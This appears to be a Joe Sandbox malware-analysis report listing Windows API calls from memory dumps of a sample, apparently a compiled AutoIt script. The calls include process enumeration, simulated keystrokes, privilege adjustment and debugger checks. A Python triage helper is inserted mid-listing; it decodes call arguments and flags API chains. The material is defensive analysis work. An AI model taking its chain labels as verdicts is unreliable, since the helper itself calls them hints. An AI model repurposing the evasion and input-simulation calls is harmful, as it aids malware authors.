• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B29BA8
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B29C75
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
• Opcode ID: ef403f75dcaed3a4a201a653c63ef354f6356f250f406b9d52028e9a80a49f23
• Instruction ID: 1fd0455bb884006c2f1698d13562ba8a4c484b07f970f27914391d9909684086
• Opcode Fuzzy Hash: ef403f75dcaed3a4a201a653c63ef354f6356f250f406b9d52028e9a80a49f23
• Instruction Fuzzy Hash: 52416071905219AFDF55DFA4D989AEE7BF8FF05310F24409AE409A6191EB309E84CF60
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID:
• String ID: 014100614100614100814100914100414100d14100e14100014100b14100a14100614100c141000141000141000141000141000141000141006141006141008141$ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-3703302220
• Opcode ID: 1c5d0364e98c165394fcd2af8df760a2ef3fd188e206eba06d573a192e53764f
• Instruction ID: d1e8a0ae84389079bdbf6cfbf6ee48b4e3fc3744657e87bb0278103c1308de1e
• Opcode Fuzzy Hash: 1c5d0364e98c165394fcd2af8df760a2ef3fd188e206eba06d573a192e53764f
• Instruction Fuzzy Hash: 5EA26D70E0061ACBDF24CF98C9507FDB7B9BF54314F2481A9EA15AB286EB749D81CB50
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AC9A4E
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00AC9B23
                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00AC9B36
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Color$LongProcWindow
• String ID:
• API String ID: 3131106179-0
APIs
  • Part of subcall function 00B3304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B3307A
  • Part of subcall function 00B3304E: _wcslen.LIBCMT ref: 00B3309B
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B3185D
• WSAGetLastError.WSOCK32 ref: 00B31884
• bind.WSOCK32(00000000,?,00000010), ref: 00B318DB
• WSAGetLastError.WSOCK32 ref: 00B318E6
• closesocket.WSOCK32(00000000), ref: 00B31915
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00B3A6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 00B3A6BA
  • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
• Process32NextW.KERNEL32(00000000,?), ref: 00B3A79C
• CloseHandle.KERNEL32(00000000), ref: 00B3A7AB
  • Part of subcall function 00ACCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00AF3303,?), ref: 00ACCE8A
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B1AAAC
• SetKeyboardState.USER32(00000080), ref: 00B1AAC8
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B1AB36
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B1AB88
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 00B2CE89
• GetLastError.KERNEL32(?,00000000), ref: 00B2CEEA
• SetEvent.KERNEL32(?,?,00000000), ref: 00B2CEFE
Similarity
• API ID: ErrorEventFileInternetLastRead
• String ID:
• API String ID: 234945975-0
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B182AA
Strings
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00B25CC1
• FindNextFileW.KERNEL32(00000000,?), ref: 00B25D17
• FindClose.KERNEL32(?), ref: 00B25D5F
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
APIs
• IsDebuggerPresent.KERNEL32 ref: 00AE271A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AE2724
• UnhandledExceptionFilter.KERNEL32(?), ref: 00AE2731
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B251DA
                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B25238
                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00B252A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1682464887-0
                                                                                                                  • Opcode ID: 6eac1137b9081d23797d701284c2ab731cad2f0c1e5fcc9d3f00469cbcb1c973
                                                                                                                  • Instruction ID: 383090690ebd625adb4fcc08ce397e0430b0a0db667c4d63cd5099b4a6365354
                                                                                                                  • Opcode Fuzzy Hash: 6eac1137b9081d23797d701284c2ab731cad2f0c1e5fcc9d3f00469cbcb1c973
                                                                                                                  • Instruction Fuzzy Hash: B1314C75A00618DFDB00DF54D884EADBBF4FF49314F148099E809AB3A2DB31E955CB90
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00ACFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AD0668
                                                                                                                    • Part of subcall function 00ACFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AD0685
                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B1170D
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B1173A
                                                                                                                  • GetLastError.KERNEL32 ref: 00B1174A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 577356006-0
                                                                                                                  • Opcode ID: f3e02fc21db5b9d4cb209265972ea0bb876637b7b65fb5a0893bc1c8759a81ee
                                                                                                                  • Instruction ID: 6896f920bdbf75113cce485ad984cfe80bf2d6fe4e7496d6536ba79e25b7365d
                                                                                                                  • Opcode Fuzzy Hash: f3e02fc21db5b9d4cb209265972ea0bb876637b7b65fb5a0893bc1c8759a81ee
                                                                                                                  • Instruction Fuzzy Hash: CF11C1B2400304AFD7189F54DCC6EAABBF9FB04714B20856EE05657291EB70BC818A24
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B1D608
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00B1D645
                                                                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B1D650
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 33631002-0
                                                                                                                  • Opcode ID: 0e9a2ba3bcff6e2701e34bbf6fe3bd87a04c6015827d6692d99c9f8b4720d11d
                                                                                                                  • Instruction ID: 091708a47fbb32750fd9cfdb1631cb6ba504ee86846fb61e4a8e5c8d4d241ba6
                                                                                                                  • Opcode Fuzzy Hash: 0e9a2ba3bcff6e2701e34bbf6fe3bd87a04c6015827d6692d99c9f8b4720d11d
                                                                                                                  • Instruction Fuzzy Hash: CE113C75E05228BBDB208F999C45FAFBFBCEB46B50F108155F904E7290D6B05A058BA1
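The function records in this listing carry enough call-site arguments to decode several of them without opening the dump. The helper below is an added example for this report, not Joe Sandbox or AutoIt code: it parses records in the form shown here (its SAMPLE text is copied from these records, trimmed to the lines the parser reads), decodes the DeviceIoControl control code 002D1400 through the CTL_CODE layout (device type 0x2D, FILE_DEVICE_MASS_STORAGE, function 0x500, METHOD_BUFFERED, which is IOCTL_STORAGE_QUERY_PROPERTY; the 0xC input and 0x28 output sizes in the record match STORAGE_PROPERTY_QUERY and STORAGE_DEVICE_DESCRIPTOR), recovers the sub-authorities 32-544 passed to AllocateAndInitializeSid (S-1-5-32-544, BUILTIN\Administrators, if the unresolved identifier authority is SECURITY_NT_AUTHORITY), and tags the SetErrorMode/GetDiskFreeSpaceExW and LookupPrivilegeValueW/AdjustTokenPrivileges chains. The chain labels are this example's own triage rules and are hints rather than verdicts: the same chains occur in benign runtime code, and the report identifies the sample as a compiled AutoIt script.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records and flag API chains.
Added triage helper for this report, not Joe Sandbox or AutoIt code: SAMPLE is copied
from the report's records (trimmed to the lines read); labels are hints, not verdicts."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00B251DA
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B25238
• SetErrorMode.KERNEL32(00000000), ref: 00B252A1
• Opcode ID: 6eac1137b9081d23797d701284c2ab731cad2f0c1e5fcc9d3f00469cbcb1c973
APIs
  • Part of subcall function 00ACFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AD0668
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B1170D
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B1173A
• GetLastError.KERNEL32 ref: 00B1174A
• Opcode ID: f3e02fc21db5b9d4cb209265972ea0bb876637b7b65fb5a0893bc1c8759a81ee
APIs
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00B1D645
• Opcode ID: 0e9a2ba3bcff6e2701e34bbf6fe3bd87a04c6015827d6692d99c9f8b4720d11d
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B1168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B116A1
• Opcode ID: 5fece2eac7548509a2f91fa8da064e0b73ffaec1587f741e3779baaf85c0bb7c
"""

# "• Name.MODULE(args), ref: ADDR"; the args and the "Part of subcall" prefix are optional.
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
OPCODE_RE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9a-f]+)")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list  # raw hex strings from the record; "?" means the value was not resolved
    ref: int    # call-site address

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    opcode_id: str = ""

def parse_records(text):
    # Each record ends at its "Opcode ID" line; records without API lines stay empty.
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        if m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] is not None else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif m := OPCODE_RE.match(line):
            cur.opcode_id = m["id"]
            records.append(cur)
            cur = FunctionRecord()
    return records

# CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method.
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
KNOWN_IOCTLS = {0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}  # FILE_DEVICE_MASS_STORAGE, fn 0x500

def decode_ioctl(code):
    return {"device_type": code >> 16, "access": (code >> 14) & 3,
            "function": (code >> 2) & 0xFFF, "method": METHODS[code & 3],
            "name": KNOWN_IOCTLS.get(code, "unknown")}

def sid_rids(call):
    # AllocateAndInitializeSid: arg 1 is the sub-authority count, args 2.. the RIDs.
    count = int(call.args[1], 16)
    return [int(a, 16) for a in call.args[2:2 + count]]

# Chains worth a second look; they also occur in benign runtime code (compiled AutoIt here).
CHAINS = [
    ({"SetErrorMode", "GetDiskFreeSpaceExW"},
     "free-disk-space query with error dialogs suppressed (common input to sandbox sizing checks)"),
    ({"LookupPrivilegeValueW", "AdjustTokenPrivileges"}, "enables a named token privilege"),
    ({"AllocateAndInitializeSid", "CheckTokenMembership"}, "tests the caller's token for a group SID"),
]

def flag_record(rec):
    names = {c.name for c in rec.calls}
    hits = [label for need, label in CHAINS if need <= names]
    for c in rec.calls:
        if c.name == "DeviceIoControl" and len(c.args) > 1 and c.args[1] != "?":
            code = int(c.args[1], 16)
            d = decode_ioctl(code)
            hits.append(f"DeviceIoControl 0x{code:X} -> {d['name']} (device 0x{d['device_type']:X}, "
                        f"function 0x{d['function']:X}, {d['method']})")
        if c.name == "AllocateAndInitializeSid":
            # Authority pointer is "?" in the record; under SECURITY_NT_AUTHORITY, 32-544 is S-1-5-32-544.
            hits.append("builds SID with sub-authorities " + "-".join(map(str, sid_rids(c))))
    return hits

def triage(text):
    # Opcode ID -> hints, for every record that raised at least one.
    out = {}
    for rec in parse_records(text):
        if hints := flag_record(rec):
            out[rec.opcode_id] = hints
    return out
```

Feed `triage` the whole listing copied from the report to get one hint list per Opcode ID; records for which the plugin resolved no imports (an "APIs" block with no call lines, as a few records in this listing show) parse as empty and raise no hint, and the Opcode ID lets a hit be matched back to the record and its memory dump source.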
                                                                                                                  APIs
                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B1168C
                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B116A1
                                                                                                                  • FreeSid.ADVAPI32(?), ref: 00B116B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3429775523-0
                                                                                                                  • Opcode ID: 5fece2eac7548509a2f91fa8da064e0b73ffaec1587f741e3779baaf85c0bb7c
                                                                                                                  • Instruction ID: 0f35468562305215cca28c26d6a2a37962932eb687cf03b462c09e82df4d3576
                                                                                                                  • Opcode Fuzzy Hash: 5fece2eac7548509a2f91fa8da064e0b73ffaec1587f741e3779baaf85c0bb7c
                                                                                                                  • Instruction Fuzzy Hash: D4F0F475A51309FBDB00DFE49C89AAEBBBCFB08605F5049A5E501E2281E774AA448A54
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00AE28E9,?,00AD4CBE,00AE28E9,00B788B8,0000000C,00AD4E15,00AE28E9,00000002,00000000,?,00AE28E9), ref: 00AD4D09
                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00AD4CBE,00AE28E9,00B788B8,0000000C,00AD4E15,00AE28E9,00000002,00000000,?,00AE28E9), ref: 00AD4D10
                                                                                                                  • ExitProcess.KERNEL32 ref: 00AD4D22
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1703294689-0
                                                                                                                  • Opcode ID: 40ccfd5c8423a9a88e1b586008d5fa65a4db437e8ae4d9749eeb69347087528f
                                                                                                                  • Instruction ID: 81ae648ad613eda1f5261eba116437cf0044cdeff90b5e03af5ba32ac3543788
                                                                                                                  • Opcode Fuzzy Hash: 40ccfd5c8423a9a88e1b586008d5fa65a4db437e8ae4d9749eeb69347087528f
                                                                                                                  • Instruction Fuzzy Hash: 5CE0B635001188AFCF61AF64DE09A593F6AFB46B81B144015FC569B222CB35DE42CA84
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: /
                                                                                                                  • API String ID: 0-2043925204
                                                                                                                  • Opcode ID: 9a0f2913d7e6f3cf07556569badab25a255b0a2881fb62663311626161663dd8
                                                                                                                  • Instruction ID: 654b4b2059695148603ac184f115af7f548848f76fa913531ba81a3adad9b7e3
                                                                                                                  • Opcode Fuzzy Hash: 9a0f2913d7e6f3cf07556569badab25a255b0a2881fb62663311626161663dd8
                                                                                                                  • Instruction Fuzzy Hash: D3413B765002596FCB20AFBACC49EBBB77CEB84724F10426DF915DB180E6709D82CB50
                                                                                                                  APIs
                                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00B0D28C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: NameUser
                                                                                                                  • String ID: X64
                                                                                                                  • API String ID: 2645101109-893830106
                                                                                                                  • Opcode ID: 504844cbc403c042f04e9303de3c39dd394d74dc550700bc1facafe02461f37e
                                                                                                                  • Instruction ID: 9dea95569506dc248549d49192f0edac32a6cdf7107010586301e0efab1c711e
                                                                                                                  • Opcode Fuzzy Hash: 504844cbc403c042f04e9303de3c39dd394d74dc550700bc1facafe02461f37e
                                                                                                                  • Instruction Fuzzy Hash: DCD0C9B480211DEBCB90CB94DCC8DD9B7BCBB04305F100195F106A2140DB3096488F10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                  • Instruction ID: 60bd4f9d61c20c4e40f39090ef4c0f3c26ee30c45c41ad2dd44b5f95c368f28b
                                                                                                                  • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                  • Instruction Fuzzy Hash: 1E021E71E0021A9FDF14CFA9C9806ADFBF1EF48324F65416AD91AE7384D731AA41CB94
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B26918
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B26961
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B34891,?,?,00000035,?), ref: 00B237E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00B34891,?,?,00000035,?), ref: 00B237F4
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B1B25D
• keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00B1B270
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B111FC), ref: 00B110D4
• CloseHandle.KERNEL32(?,?,00B111FC), ref: 00B110E9
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
Strings
• Variable is not of type 'Object'., xrefs: 00B00C40
Similarity
• API ID:
• String ID: Variable is not of type 'Object'.
• API String ID: 0-1840281001
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AE6766,?,?,00000008,?,?,00AEFEFE,00000000), ref: 00AE6998
Similarity
